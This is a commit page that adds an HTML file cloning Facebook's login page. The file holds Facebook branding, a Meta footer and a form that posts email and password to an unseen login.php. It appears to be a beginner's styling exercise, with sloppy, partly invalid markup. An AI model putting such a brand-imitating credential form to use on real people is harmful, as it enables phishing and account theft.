subhanali12 commited on
Commit
9c8f07a
·
verified ·
1 Parent(s): b5e93c5

Create facebook login page.html

Browse files
Files changed (1) hide show
  1. facebook login page.html +584 -0
facebook login page.html ADDED
@@ -0,0 +1,584 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Facebook Login</title>
7
+ <style>
8
+ body {
9
+ font-family: Arial, sans-serif;
10
+ background-color: #f0f2f5;
11
+ margin: 10;
12
+
13
+ display: flex;
14
+ justify-content: center;
15
+ align-items: center;
16
+ height: 67vh;
17
+ }
18
+ .container {
19
+ display: flex;
20
+ justify-content: left;
21
+ align-items: center;
22
+ width: 70%;
23
+ max-width: 1000px;
24
+ margin-bottom: 78px;
25
+ padding: 120px;
26
+ }
27
+
28
+
29
+
30
+
31
+ .left {
32
+ flex: 1;
33
+ margin-bottom: 02px;
34
+ margin-left: 0.5px;
35
+ margin-right: 10px; /* left side contsiner and all over the width managing like space b/w them log in or add account*/
36
+ }
37
+ .right {
38
+ flex: 10;
39
+ max-width: 350px;
40
+ height: 310px;
41
+ background-color: #fff;
42
+
43
+ border-radius: 8px;
44
+ margin-top: 69px;
45
+ margin-right: 19px;
46
+ padding: 20px;
47
+ padding-right: 30px;
48
+ padding-left: 15px;
49
+ padding-top: 3.5px;
50
+ padding-bottom: 40px;
51
+
52
+
53
+
54
+ box-shadow: 0 4px 12px rgba(8, 8, 5, 0.18);
55
+ }
56
+ .left h1 {
57
+ color: #1877f2;
58
+ font-size: 44px;
59
+ margin-bottom: 0px;
60
+ margin-top: 12px;
61
+
62
+
63
+
64
+ }
65
+ .left h5{
66
+ font-size: 18px;
67
+ height: 23px;
68
+ color: hwb(0 46% 54%);
69
+ width: 0px;
70
+ margin-left: 38px;
71
+ margin-right: 27px;
72
+ margin-top: 23px;
73
+ margin-bottom: 11px;
74
+ }
75
+
76
+ .left p {
77
+ font-size: 36px;
78
+
79
+ color: #333232;
80
+ margin-top: 8px;
81
+ margin-bottom: 6px;
82
+ margin-left: 0.5px;
83
+
84
+
85
+ }
86
+ .right h2 {
87
+ text-align: center;
88
+ color: #1877f2;
89
+ font-size: 28px;
90
+ margin-bottom: 10px;
91
+ }
92
+ .right input {
93
+ width: 100.8%;
94
+ height: 10px;
95
+ padding-top: 18px;
96
+ padding-bottom: 18px;
97
+ padding: 20px;
98
+ margin-top: 13px;
99
+ padding-right: 0px;
100
+ font-size: 16px;
101
+ letter-spacing: 0.5px;
102
+ padding-left: 9px;
103
+
104
+ border: 1px solid #dfdfdf;
105
+ border-radius: 5px;
106
+ background-size: 100%;
107
+ }
108
+ .right button {
109
+ -webkit-text-stroke-width: 0.5px;
110
+ width: 104%;
111
+ padding: 12px;
112
+ padding-bottom: 12px;
113
+ margin-top: 230px;
114
+ padding-top: 16px;
115
+ margin-top: 15px;
116
+ margin-left: 1px;
117
+ background-color: #0a6beb;
118
+ border: none;
119
+ color: #fff;
120
+ font-size: 20px;
121
+ letter-spacing: 0.8px;
122
+ border-radius: 6px;
123
+ cursor: pointer;
124
+ }
125
+
126
+ .right button:hover {
127
+
128
+ background-color: #165db1;
129
+ }
130
+ .right .create-account {
131
+ width: 90%;
132
+ padding: 16px;
133
+ padding-top: 16px;
134
+ padding-bottom: 15px;
135
+ -webkit-text-stroke-width: 0.4px;
136
+ background-color: #12bd12;
137
+ color: #fff;
138
+ font-size: 15.8px;
139
+ letter-spacing: 1px;
140
+ border-radius: 5px;
141
+ cursor: pointer;
142
+
143
+
144
+ margin-top: 100px; /* Adds gap between the hr line and the create account button */
145
+ margin-left: 78.9px;
146
+ padding-right: 16px;
147
+ }
148
+ .right a {
149
+ display: block;
150
+ text-align: center;
151
+ margin-top: 17px;
152
+ margin-left: 15px;
153
+ margin-bottom: 21px;
154
+ color: #1877f2;
155
+ text-decoration:none;
156
+ font-size: 14.1px;
157
+
158
+ }
159
+ .right a:hover {
160
+ text-decoration: underline;
161
+
162
+ }
163
+
164
+ .profile-container {
165
+ display: flex;
166
+ align-items: center;
167
+ margin-top: 26px;
168
+ margin-bottom: 11px;
169
+
170
+ }
171
+ .profile {
172
+ display: flex;
173
+
174
+ align-items: center;
175
+ background-color: #fff;
176
+ border: 1px solid #ddd;
177
+ border-radius: 8px;
178
+ padding-top: 149px;
179
+ padding-right: 83px;
180
+ margin-right: 15px;
181
+
182
+ background-image: url("snv.png");
183
+ background-repeat: no-repeat;
184
+ background-size: 190px 159px ;
185
+ cursor: pointer;
186
+ }
187
+ .profile h5{
188
+ padding-left: 7px;
189
+ margin-left: 43px;
190
+ margin-bottom: 9px;
191
+ }
192
+ .profile2 {
193
+ border-radius: 5%;
194
+ margin-right: 0px;
195
+ display: flex;
196
+ padding-left: 8px;
197
+ background-color: #fff;
198
+ border: 1px solid #ddd;
199
+ padding-top: 156px;
200
+ padding-right: 0px;
201
+ width: 153px;
202
+ cursor: pointer;
203
+ background-image: url("fbk-butto.jpg");
204
+ background-repeat: no-repeat;
205
+ background-size: 190px 160px;
206
+
207
+ }
208
+ .profile2 h5{
209
+ width: 140px;
210
+ text-align: center;
211
+ font-size: 15px;
212
+ margin-left: 10px;
213
+ margin-right: 0px;
214
+ margin-top: 19px;
215
+ margin-bottom: 8px;
216
+ padding-left: 8px;
217
+ text-align: left;
218
+
219
+ color:pointer;
220
+
221
+
222
+
223
+ }
224
+ /* .profile span {
225
+ font-size: 108px;
226
+ color: #000;
227
+
228
+ } */
229
+ .small-text{
230
+ color: #646262;
231
+ font-size: 15px;
232
+ margin-top: 20px;
233
+ margin-left: 0.5px;
234
+
235
+
236
+ }
237
+ .line{
238
+ color: #b1afaf;
239
+ opacity: 19%;
240
+ margin-top: 2px;
241
+ width: 363px;
242
+
243
+ padding-bottom: 0.1px;
244
+ margin-bottom: 42px;
245
+
246
+
247
+ }
248
+ .right a.create-a-page{
249
+ color: black;
250
+ font-size: 14px;
251
+ margin-top: 67px;
252
+ margin-left: 15px;
253
+
254
+ }
255
+ .facebook-logo{
256
+ height: 32px;
257
+ margin-bottom: 4px;
258
+ margin-left: 1px;
259
+
260
+
261
+ }
262
+ .additional-container {
263
+ width: 97.9%;
264
+ background-color: #fff;
265
+ padding: 20px;
266
+ padding-top: 16px;
267
+ position: absolute;
268
+ padding-bottom: 30px;
269
+ bottom: 0px;
270
+ left: 0px;
271
+ margin-top: 0px; /* Adjust margin as needed */ }
272
+ .additional-container p{
273
+ font-size: 12px;
274
+ color: rgb(107, 106, 106);
275
+ margin-left: 441px;
276
+ margin-top: 15px;
277
+ margin-bottom: 5px;
278
+ }
279
+ .additional-container a{
280
+ text-decoration: none;
281
+ font-size: 12px;
282
+ color: rgb(145, 144, 144);
283
+ margin-left: 6.7px;
284
+
285
+
286
+
287
+ }
288
+ .additional-container a:hover{
289
+ text-decoration: underline;
290
+ }
291
+ .button4-plus{
292
+ background-image: url(/HTML/plus.png);
293
+ background-repeat: no-repeat;
294
+ background-position: 8px 3px;
295
+ background-size: 12px 12px;
296
+ background-color: #f5f5f5;
297
+ border-color: black;
298
+ border: 1px solid rgb(207, 206, 206);
299
+ padding-top: 2px;
300
+ border-radius: 1.5px;
301
+ padding-left: 18px;
302
+ padding-right: 10px;
303
+ padding-bottom: 2px;
304
+ margin-left: 10px;
305
+ cursor: pointer;
306
+
307
+ }
308
+ .additional-container hr{
309
+ width: 978px;
310
+ /* margin-bottom: 114px; */
311
+ margin-right: 460px;
312
+ margin-bottom: 0px;
313
+ margin-top: 10px;
314
+ border: 0.01px solid rgb(234, 234, 235);
315
+
316
+ }
317
+ .bt-feature {
318
+ text-decoration: none;
319
+ font-size: 12px;
320
+ color: rgb(145, 144, 144);
321
+ margin-left: 424px;
322
+
323
+ margin-top: 10px;
324
+
325
+
326
+
327
+ }
328
+ .bt-feature a{
329
+ margin-left: 17px;
330
+
331
+ }
332
+ .bt-feature a2{
333
+ margin-left: 17px;
334
+
335
+ }
336
+ .bt-feature a2:hover{
337
+ text-decoration: underline;
338
+ cursor: pointer;
339
+
340
+
341
+ }
342
+ .bt-feature a3{
343
+ margin-left: 16.5px;
344
+
345
+ }
346
+ .bt-feature a3:hover{
347
+ text-decoration: underline;
348
+ cursor: pointer;
349
+
350
+
351
+ }
352
+ .bt-feature a4{
353
+ margin-left: 16.2px;
354
+
355
+ }
356
+ .bt-feature a4:hover{
357
+ text-decoration: underline;
358
+ cursor: pointer;
359
+
360
+
361
+ }
362
+ .bt-feature a5{
363
+ margin-left: 16px;
364
+
365
+ }
366
+ .bt-feature a5:hover{
367
+ text-decoration: underline;
368
+ cursor: pointer;
369
+
370
+
371
+ }
372
+ .bt-feature a6{
373
+ margin-left: 16px;
374
+
375
+ }
376
+ .bt-feature a6{
377
+ text-decoration: underline;
378
+ cursor: pointer;
379
+
380
+
381
+ }
382
+ .space{
383
+ margin-top: 5px;
384
+
385
+ }
386
+ .space a9{
387
+ margin-left: 15.9px;
388
+ }
389
+ .space a9:hover{
390
+ text-decoration: underline;
391
+ cursor: pointer;
392
+
393
+ }
394
+ .space a0{
395
+ margin-left: 15.9px;
396
+ }
397
+ .space a0:hover{
398
+ text-decoration: underline;
399
+ cursor: pointer;
400
+
401
+ }
402
+ .space a11{
403
+ margin-left: 15.9px;
404
+ }
405
+ .space a11:hover{
406
+ text-decoration: underline;
407
+ cursor: pointer;
408
+
409
+ }
410
+ .sndspace{
411
+ margin-top: 5px;
412
+ }
413
+
414
+ .sndspace img{
415
+
416
+ height: 10px;
417
+ width: 12px;
418
+ position: 0px 0px;
419
+ margin-bottom: 0px;
420
+
421
+
422
+
423
+ }
424
+ .sndspace a12{
425
+ margin-left: 16px;
426
+
427
+ }
428
+ .sndspace a12:hover{
429
+ text-decoration: underline;
430
+ cursor: pointer;
431
+
432
+ }
433
+ .sndspace a13:hover{
434
+ text-decoration: underline;
435
+ cursor: pointer;
436
+
437
+ }
438
+
439
+ .sndspace a13{
440
+ margin-left: 16px;
441
+ }
442
+ .sndspace a14{
443
+ margin-left: 16.5px;
444
+ }
445
+ .sndspace a14:hover{
446
+ text-decoration: underline;
447
+ cursor: pointer;
448
+
449
+ }
450
+ .sndspace p{
451
+ font-size: 11px;
452
+ color: #757373;
453
+ margin-left: 17px;
454
+ margin-top: 25px;
455
+ }
456
+
457
+ </style>
458
+ </head>
459
+ <body>
460
+ <div class="container">
461
+ <div class="left">
462
+ <h1><img src="/templates/fbk-logo.png"alt="login page" class="facebook-logo" width="172px"></h1>
463
+ <p >Recent logins</p>
464
+ <small class="small-text">
465
+
466
+ Click your picture or add an account</small>
467
+
468
+ <div class="profile-container">
469
+ <div class="profile">
470
+ <h5>Subhan</h5>
471
+ </div>
472
+ <div class="profile2">
473
+
474
+
475
+ <h5>
476
+ <a href="#" style=" text-decoration: none; color: #1877f2;">
477
+ Add an account
478
+ </a>
479
+ </h5>
480
+
481
+
482
+ </div>
483
+ </div>
484
+ </div>
485
+ <div class="right">
486
+ <!-- <h2>Log In to Facebook</h2> -->
487
+ <form action="login.php" method="post">
488
+ <input type="text" name="email" placeholder=" Email or phone number" required>
489
+ <input type="password" name="password" placeholder=" password" required>
490
+ <button type="submit">Log in</button>
491
+ <a href="#">Forgot your password?</a>
492
+ <hr class="line" noshade="0px" size="1.4">
493
+ <button2 type="submit" class="create-account" > Create a new account
494
+ </button2>
495
+ <a href="action.php" method="post" class="create-a-page" style="text-decoration: none;"><b>
496
+
497
+ Create a page for
498
+ </b> a celebrity, brand or business .
499
+ </a>
500
+ </div>
501
+ </form>
502
+ <!-- it is additional blank vontainer bottom of the page here we write languages and its some other info like copyright -->
503
+ <div class="additional-container">
504
+ <p>Marathi <a href="#">
505
+ Hindi <a href="#">
506
+ Urdu <a href="#">
507
+ Punjabi <a href="#">
508
+ Bangla <a href="#">
509
+ Gujarati <a href="#">
510
+ Tamil <a href="#">
511
+ Telugu <a href="#">
512
+ Malayalam <a href="#">
513
+ Kannada <a href="#">
514
+ English (UK)</a>
515
+ </a><button4 class="button4-plus"></button4> <hr>
516
+ </a>
517
+ </a>
518
+ </a>
519
+ </a>
520
+ </a>
521
+ </a>
522
+ </a>
523
+ </a>
524
+
525
+ <div class="bt-feature">
526
+
527
+ <a href="#">Sign up</a>
528
+ <a href="#"> Log in</a>
529
+ <a2 href="#">Messenger</a2>
530
+ <a3 href="#">Facebook Lite</a3>
531
+ <a4 href="#">Video</a4>
532
+ <a href="#">places</a>
533
+ <a href="#">Games</a>
534
+ <a href="#">Marketplace</a>
535
+ <a5 href="#">Meta Pay</a5>
536
+ <a href="#">Meta Store</a>
537
+ <a6 href="#">Meta Quest</a6>
538
+ <a href="#">Ray-Ban Meta</a>
539
+ <a href="#">Meta AI</a>
540
+ <a href="#">Instagram</a>
541
+ <br>
542
+ <div class="space">
543
+
544
+ <a href="#">Threads</a>
545
+ <a href="#">Assistance Fund</a>
546
+ <a href="#">service</a>
547
+ <a9 href="#">Voter Information Centre</a9>
548
+ <a href="#">Privacy Policy</a>
549
+ <a href="#">Privacy Center</a>
550
+ <a href="#">groups</a>
551
+ <a0 href="#">Information</a0>
552
+ <a href="#">Create an ad</a>
553
+ <a href="#">Create a page</a>
554
+ <a11 href="#">developer</a11>
555
+
556
+ <div class="sndspace">
557
+
558
+ <a href="#">Career</a>
559
+ <a href="#">Cookies</a>
560
+ <a12 href="#" >Ad selection </a12>
561
+ <img src="/HTML/ad.png" alt="image">
562
+ <a13 href="#">conditions</a13>
563
+ <a href="#">help</a>
564
+ <a14 href="#">Contact with uploading and non-users</a14>
565
+ <p>Meta © 2024</p>
566
+
567
+
568
+ </div>
569
+
570
+
571
+ </div>
572
+
573
+
574
+ </div>
575
+
576
+
577
+
578
+
579
+ </div>
580
+
581
+ </div>
582
+ </div>
583
+ </body>
584
+ </html>